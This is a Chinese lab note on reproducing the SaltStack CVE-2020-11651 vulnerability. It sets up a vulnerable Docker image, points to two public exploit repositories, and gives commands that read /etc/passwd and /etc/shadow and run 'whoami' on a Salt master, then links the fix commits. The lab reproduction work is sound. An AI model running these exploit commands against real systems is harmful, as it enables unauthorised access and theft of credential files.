SaltStack-安全复现

1、部署复现环境

yum install -y docker
systemctl start docker
docker pull vulfocus/saltstack-cve_2020_11651
docker run -d -p 4506:4506 -p 4505:4505 vulfocus/saltstack-cve_2020_11651

参考：

https://www.cnblogs.com/Cl0wn/p/12918432.html

2、设置国内镜像源

# vi /etc/docker/daemon.json
{
    "registry-mirrors": ["http://hub-mirror.c.163.com"]
}
systemctl restart docker.service

参考：

https://blog.csdn.net/whatday/article/details/86770609

3、python3安装salt

4、脚本复现

1）版本一

路径： https://github.com/Imanfeng/SaltStack-Exp.git

命令：

python3 exp.py --master 10.30.37.26 --read /etc/passwd

参考：

https://www.cnblogs.com/Cl0wn/p/12918432.html

2）版本二

路径： https://github.com/jasperla/CVE-2020-11651-poc

命令1：

python3 exploit.py --master 10.30.37.26 -r /etc/shadow

命令2：

python3 exploit.py --master 10.30.37.26 --exec "whoami"

5、修复问题：

https://github.com/saltstack/salt/commit/a67d76b15615983d467ed81371b38b4a17e4f3b7

https://github.com/saltstack/salt/commit/d5801df94b05158dc8e48c5e6912b065044720f3